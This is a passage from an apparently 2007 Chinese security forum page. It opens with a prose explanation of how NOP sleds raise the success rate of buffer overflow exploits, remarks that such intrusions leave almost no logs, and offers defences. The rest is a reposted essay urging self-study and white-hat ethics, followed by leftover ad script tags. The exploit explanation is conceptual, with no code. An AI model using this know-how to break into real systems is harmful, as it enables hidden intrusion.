NOP。在shell代码前防一长串的NOP，返回地址可以指向这一串NOP中任一位置，执行完NOP后程序将激活shell进程，这样就大大的增加了猜中的可能性。（还得猜） 之所以选择这段代码给小容看，是因为这种缓冲区溢出的技术是很奏效的，也是很多黑客和入侵者采用的惯用手段，因为它不是正常登陆的超级用户权限，所以几乎没有任何记录。 目前对上述攻击手段的防范方法来看，很多webmaster都说没有根本解决的好办法，最好的办法就是完善程序，使函数无懈可击（可能吗，别忘了我们是干什么的）。另外要注意打各种path，从根本上杜绝函数的漏洞，作为应急的办法，可以把有危险的程序的Suid位去掉，需要时再加上，只是比较麻烦而已。 不知上述，大眼圈同学看懂了没有，和你说的那篇觉得有什么共同之处吗？ 作者: csjianglan 发布日期: 2007-5-03 你尽力了吗 这是我的同事alert7在他主页上转scz的《你尽力了吗》，之前说的一段话，一些肺腑直言，我觉得我该说的alert7也帮我说了，希望我们以及前人的思路可以指引大家 /// 自己都觉得这里的水平底的一塌糊涂，当然也包括我自己了，所以我经常也要跑到whnet去问问题，有时候都恨自己怎么这么菜啊。 scz(四哥)说：BBS是不能真正学到东西的，不过这里能开阔人的视野，能得到对大方向的指引，能够了 。 是的，真的是足够了，要不是scz的指引，我不会走这条路的，当时在gznet的BBS 上，我也问了好多关于unix network programming的问题，得到好多人的帮助。后来转而学习linux kernel，来到了whnet,主要就是得到scz的帮助，我很感谢他。我想他在教育网内是很成功的，可能带起了一群人。 自己的成长其实就是生产问题，解决问题的过程。问题就是在自己不断的学习中产生的，你学习了吗？你努力了吗？你有问题要问吗？ 自己付出了多少，就会有多大的收获，这点我有很大很大的体会。 转了这么多的技术文章，不是为了增加版面，增加人气，完全是给有心人看的,自己要想学，想看才能学进去，看进去。希望他们能在这里得到进阶。 转了这么多的技术文章，只是希望川大的“黑客”(暂且以黑客称之)不要误入歧途，不要只做被人们称为的脚本小子，要做就做一个白帽(white-hat). 没人敢说自己是黑客，除非他自己知道他在说什么。所以我也没有用黑客这个词. 我做这里的斑竹的目的不是来一个人撑起一个版的，只是为了上面的几点。今天又去了linuxforum，颇有感触，如果你也在linux kernel hack(也许你会对hack 这词误会),如果你看过linux的源代码就不会觉得奇怪了)话，去http://www.linuxforum.net/cgi-bi ... t=&Board=linuxK 感受感受真正做学问的气氛吧。 有必要大家来重温一下四哥那篇《你尽力了吗》。看看真正高手的那份淡然吧 发信人: cloudsky (小四), 信区: Security 标 题: 你尽力了吗发信站: 武汉白云黄鹤站 (Mon Apr 17 19:52:54 2000), 站内信件 很多人问如何入门如何入门，我却不知道要问的是入什么门。很少把某些好文章耐心从头看完，我这次就深有体会。比如袁哥的sniffer原理，一直以为自己对sniffer原理很清楚的，所以也就不曾仔细看过袁哥的这篇。后来有天晚上和袁哥讨论，如何通过端口读写直接获取mac地址，为什么antisniff可以获得真正的mac地址，而不受更改mac地址技术的影响，如何在linux下获得真正的mac地址。我一直对linux下的端口读写心存疑虑，总觉得在保护模式下的端口都做了内存映象等等。结果袁哥问了我一句，你仔细看我写的文章没有，我楞，最近因为要印刷月刊，我整理以前的很多文档， 被迫认真过滤它们，才发现袁哥的文章让我又有新认识。再后来整理到tt的几篇缓冲区溢出的，尤其是上面的关于Solaris可装载内核模块，那就更觉得惭愧了。以前说书非借不能读，现在是文章留在硬盘上却不读。其实本版已经很多经典文章了，也推荐了不少经典书籍了，有几个好好看过呢。W.Richard.Stevens的UNP我算是认真看过加了不少旁注，APUE就没有那么认真了，而卷II的一半认真看过，写过读书笔记，卷 III就没有看一页。道格拉斯的卷I、卷III是认真看过几遍，卷II就只断续看过。而很多技术文章，如果搞到手了就懒得再看，却不知道这浪费了多少资源，忽略了多少资源。BBS是真正能学到东西的地方吗？rain说不是的，我说也不是的。不过这里能开阔人的视野，能得到对大方向的指引，足够了。我一直都希望大家从这里学到的不是技术本身，而是学习方法和一种不再狂热的淡然。很多技术，明天就会过时，如果你掌握的是学习方法，那你还有下一个机会，如果你掌握的仅仅是这个技术本身，你就没有机会了。其实我对系统安全是真不懂，因为我一直都喜欢看程序写程序却不喜欢也没有能力攻击谁谁的主机/站点。我所能在这里做的是，为大家提供一个方向，一种让你的狂热归于淡然的说教。如果你连、< win9x系统编程>都没有看过，却要写个什么隐藏自己的木马，搞笑。如果你看都不看汇编语言，偏要问exploit code的原理，那我无法回答也不想回答你。总有人责问，要讨个说法纭纭，说什么提问却没有回答。不回答已经是正确的处理方式了，至少没有回你一句，看书去，对不对，至少没有扰乱版面让你生闷气。Unix的man手册你要都看完了， 想不会Unix都不行了。微软的MSDN、Platform SDK DOC你要看完了，你想把Win编程想象得稍微困难点都找不到理由。还是那句话，一个程序员做到W.Richard.Stevens那个份上，做到逝世后还能叫全世界的顶级hacker们专门著文怀念，但生前却不曾著文攻击，想想看，那是一种什么样的境界，那是一份什么样的淡然。我们可以大肆讨论技术问题，可以就技术问题进行激烈的卓有成效的讨论，却无意进行基础知识、资源信息的版面重复。我刚在前面贴了一堆isbase的文章，开头就是主页标识，却在后面立刻问什么主页在哪里？前面刚刚讨论过如何修改mac地址，后面马上又来一个，前后相差不过3篇文章。选择沉默已经是很多朋友忍耐力的优异表现了。很多东西都是可以举一反三的。vertex的lids，被packetstorm天天追踪更新，你要是看了THC的那三篇，觉得理解一个就理解了一堆，都是内核模块上的手脚。你不看你怎么知道。我不想在这里陷入具体技术问题的讨论中去，你要是觉得该做点什么了，就自己去看自己去找。没有什么人摆什么架子，也没有什么人生来就是干这个的。你自己问自己，尽力了吗？  <script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/760x60_2.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/468x60_2.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/770x80_2.htm&val1=50624"></script> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=6&source=ad4all_50624" frameborder="0" width="120" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=19&source=ad4all_50624" frameborder="0" width="580" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=3&source=ad4all_50624" frameborder="0" width="750" scrolling="no" height="60"> marginwidth="0" marginheight="0" src="http://www.joyo.com/union/eb.asp?k=18&source=ad4all_50624" frameborder="0" width="775" scrolling="no" height="80"><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/770x80_3.htm&val1=50624"></script><script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unionid=50624&htmlid=html/joyo/760x60_3.htm&val1=50624"></script>